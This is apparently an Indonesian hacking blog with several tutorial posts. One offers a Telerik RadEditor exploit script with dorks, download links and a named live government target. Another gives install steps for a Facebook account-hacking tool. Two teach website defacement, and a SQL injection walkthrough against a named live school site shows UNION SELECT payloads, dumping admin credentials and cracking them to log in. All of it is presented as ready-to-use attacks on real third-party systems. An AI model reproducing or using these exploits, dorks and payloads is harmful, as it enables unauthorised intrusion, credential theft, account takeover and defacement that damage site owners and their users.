Minggu, 01 Desember 2019

Upload Shell Telerick Exploit | Priv 8 Bing Dorker


MH#REGA - Upload Shell Telerick Exploit 2019 | Priv 8 Bing Dorker. gausah panjang lebar lah ya gasemua dari kalian juga pasti asing juga mendengar Exploit Telerik ini :v orang Telerik Poc masih hangat Verawaaan Owkowkwowk, nah kalo Priv8 Bing Dorkernya sudah termasuk golongan Lama dari bulan pertama 2019 ini tetapi Priv 8 Bing Dorkernya masih terbilang jos kok kalo gapercaya coba saja sendiri.

 Bahan Bahan Yang Harus DI Persiapkan
Requirement on Exploit Telerick :
  • Python V2
  • Terminal / Cmdr /Command Prompt
  • Target to scan
  • Internet Access
  • Dork inurl:/DesktopModules/RadEditorProvider/DialogHandler.aspx site:
  • inurl: DesktopModules/RadEditorProvider/DialogHandler.aspx site:
  • inurl: DesktopModules/Rad EditorProvider/DialogHandler.aspx site:

Please use manual dorking!!!
Gunakan manual dorking!!!

Exploit : /DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx
Example: http://www.site.com/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

Usage:  $ python2 fuck.py -exploit http://www.site.com/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx 48 hex 9

Live Target: http://sotuphapquangtri.gov.vn/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx

Requirement on Priv 8 Bing Dorker:
  • Python V2
  • Terminal / Cmdr /Command Prompt
  • Internet Access
Usage: python2 priv8dorker.py 

Download Exploit Telerick : https://linkqu.site/iaZaS0
Download Priv 8 Bing Dorker: https://linkqu.site/Vsu5

More Tools AutoExploiter In My Channel (Onany Mouse.)
UPCOMING PHP UNIT MASS EXPLOIT. 

GoodLuck! Nelo.F4 ( Onany Mouse. )



Diposting oleh di Tidak ada komentar:

Senin, 18 November 2019

Hack Facebook Versi 1,8

Ok,sahabat hacker kembali lagi dengan saya MH#REGA,Kali ini saya akan membagikan Tutorial Cara menginstall Dark Fb versi 1.8 di termux,tapi sebelumnya saya akan menjelaskan sedikit tentang DARK FB

Dark FB menurut saya ini adalah salah satu tools terbaik,dimana kita bisa jalankan di termux,kali,maupun so (system operasi) linux hacktivitis lainnya,dimana kegunaan nya yaitu untuk melakukan peretasan serta pengumpulan informasi terhadap suatu akun FB dengan menggunakan Akun kita sebagai perantaranya

Langsung Aja Ke tutorialNyaa 
Pertama Tama Kalian Install Aplikasi Termux Nya Di Play Store 


SetelaH Di Inatall Langsung Masuk Apk Termux Nya 
Tunggu Sampe Loading Selesai
Ini Tampilan Awalan Termuxnya 

Sesudah Di Buka Apknya Lanjut Ke Tutorialnya 
Masukan Kode Kode Di Bawa Berikut

Next.. 
SCRIPT:
$pkg update
$pkg upgrade
$pkg install git
$pkg install python2
$pip2 install requests
$pip2 install mechanize
$git clone https://github.com/bellattckr/fb-hack
$cd fb-hack
$python2 fb.py


Masukan Id/Email Facebook Anda
Dan Password Andaa

Sekian Tutorial Gw Kurang Lebihnya Mohon Maaf Bila Ada Kesalahan

 YouTube: MH REGA
instagram: @mh.rega
WhatsApp: 6288224978240

 Copyright@Mr.Beel
Diposting oleh di Tidak ada komentar:

Selasa, 15 Oktober 2019

Deface Metode Kawaii File Hosting

Deface Metode Kawai File Hosting

 Hello WhatsApp Buriq Balik Lagi Sama Gw
MH REGA GANS tq:V

 Kali Ini Gw Bakal Ajarin Cara Deface Metode Kawai File Hosting
Yang Di Mana Anak SD Juga Bisa Deface Owkowkwowk

 Langsung Aja Ke Tutor Nyaa Riq:V

 Bahan bahan yang kalian siapkan
-Dork: Kawaii File Hosting
-Udud
-Kopi
-Sabun
-OTW

Pertama Tama Yang Paling Di Utaman MH REGA GANS tq:V
Kalian Dorking Dulu Di Google Seperti Di Bawah

Naaah Sudah Lo Dorking Di Google Pilih Sama Lo Salah Satu Web Yang Vuln
MH REGA gans Kaya Gmna Contoh Web Yang Vuln Itu
Niih Gw Kasih Tau Contoh Gambar Web Yang Vuln

Naah Contoh Web Yang Vuln Kaya Gambar Di Atas Yaah Tod:Z

Terus Lo Pencet Yang Ada Bacaan “Select or drop file”
Naah Sudah Tekan Lalu Upload File Lo Tod Yang Di Perbolehkan File txt,html kalo lo bisa upload PHP Berarti Lo Pro Owkwowk

Naah Kalo Sudah Upload Nanti Akan Ada Bacaan Seperti Gambar Di Bawah Ini

Naaah Sudah Di Upload Muncul Tulisan Seperti “ https://u.trs.tn/vbesgj.txt ” Itu Artinya Vuln

Langsung Aja Lo Pencet Link Nyaa Yang Tersedia
Nanti Bakal Muncul Seperti Gambar Di Bawah Ini

Naaah Done Kan Kalo Pengen Liat Hasilnya Niih
https://u.trs.tn/vbesgj.txt
Sekian Tutor Kawaii File Hosting Nyaa Apabila Ada Kesalahan Kata Mohon Di Maafkan
Apabila Anda Kurang Paham Chat Saya Lewat Sosmed Kalia,,,,
YouTube: MH REGA
WhatsApp: 088224978240
Diposting oleh di Tidak ada komentar:

Deface Metode Admin Mistak

Deface Metode Admin Mistak

Deface Metode Ini Cukup Unik,Namanya Juga Admin Mistake Jadi Ga tau Siapa adminya.Kita Ga perlu Login Alias Langsung masuk ke Dashboardnya

Bahan Bahan Yang Kalian Siapkan
-kopi
-udud
-cewek
-sabun
-dork
-sabar

Dork Freszs Bisa Di Dowload Di Sinih
https://semawur.com/DorkFresz

 Langsung Aja nge Dork yah todz gak usah lama lama
1.Paste Dorknya Yang Menurut Lo Vuln Lalu Tempel Ke Google
2.Pilih Satu Satu Web Yang Sekiranya Vuln
ConToh Web Yang Vuln Langsung Masuk Dashbord Admin

 Naah Itu Contoh Web Yang Vuln Cari Tempat Upload Nyaa Ok

 Segituh Aja Tutor Dari Gw Apabila Ada Kesalahan Mohon Di Maafkan Saya Baru Buat Bloog
Kalo Kurang Paham Chat Saya Di Sosmed
Jangan Lupa Di Subscribe,Like And Share
YouTube: MH REGA
WhatsApp: 088224978240

Diposting oleh di 2 komentar:

Minggu, 13 Oktober 2019

DEFACE POC SQL INJECTION ON CMS BALITBANG

DEFACE POC SQL INJECTION ON CMS BALITBANG

sql injection on cms balitbang 
selamat datang dan selamat berkunjung para injector...:D
kali ini sya akan ngasih tutorial injeksi website pada cms balitbang.
seperti yang kita tahu cms balitbang memiliki banyak celah..mulai dari default password hingga registration member dengan inspect element.
tapi kali ini saya tidak akan membahas bug-bug di atas. saya akan fokus gmana masuk ke web berbasis cms balitbang dengan tekhnik sql injection.
ok..lets start..

alat2 yang di butuhkan

-kompi (wajib hukumnya.. :D)
-koneksi internet
-dork fres dowload di sinih
https://semawur.com/T93pFXG5dzEZ
-udud + kopi
-browser disarankan memakai mozilla firefox (karena kita akan menggunakan addons hackbar)
-hackbar. di sini sy memakai hackbar modifan. karena di dalmnya sudah include dios dan query untuk membypass waf. bisa di download di sini

otomatis terdownload,kemudian klik allow..kemudian kilk installnow otomatis addons hackbar terinstall di browser anda. "penting di ingat bahwa hackbar di atas sangat berguna untuk kita melakukan injeksi"
-untuk dorknya silahkan berkreasi sendiri..

anggap aja kita udah punya targetnya,. di sini saya gunakan live target http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17&profil=Sarana+&+Prasarana

kita buka browser mozilla kita ..
kita lakukan test pada url dengan menambahkan tanda kutip ( ' )

http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17'&profil=Sarana+&+Prasarana

selanjutnya kita masukan perintah union select untuk mencari angka injeksinya http://smkn1-cirebon.sch.id/html/profil.php?id=profil&kode=17+and+0+union+select+1,2,3,4,5,6,7,8--+-&profil=Sarana+&+Prasarana
ternyata muncul muncul angka ajaib yaitu 2 dan 3.

selanjutnya di sinilah fungsi hackbar kita tadi yaitu untuk melakukan dios(dump in one shoot)
buka hackbar dengan cara klik tools/show/hide hackbar atau tekan f9

kita blok angka ajaibnya di hackbar yaitu angka 3 kemudia klik UNIOON BASED -DIOS mysql -dios by madblood kemudian klik execute..(lihat gambar)

Naaaaah Lo Kan Muncul Daleman M3M3K, Ehhh Maksudnya Daleman Web Nyaa:v
Naah Cari Username sama Passwordnya yah TodZz:v

Next Kita Dump Username Dan Passwordnya


langkah selajutnya silahkan crack passwordnya dan silahkan login...tapi ingat jangan tebas index.
Kasihan yang punya web

sekian tutorial cupu dr saya...maaf kalo ada salah2 dalam penulisan maklum masih belajar bikin tutorial kak..

NB: hackbar di atas bisa di gunakan juga untuk dios web lain.. mulai dari eror based hingga dios mssql.. untuk tutorial selanjutnya harap bersabar..makasih udah berkunjung..

Jangan Lupa Di Follow And Subscribe
YouTube: MH REGA
instagram: MH REGA
WhatsApp: 088224978240
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)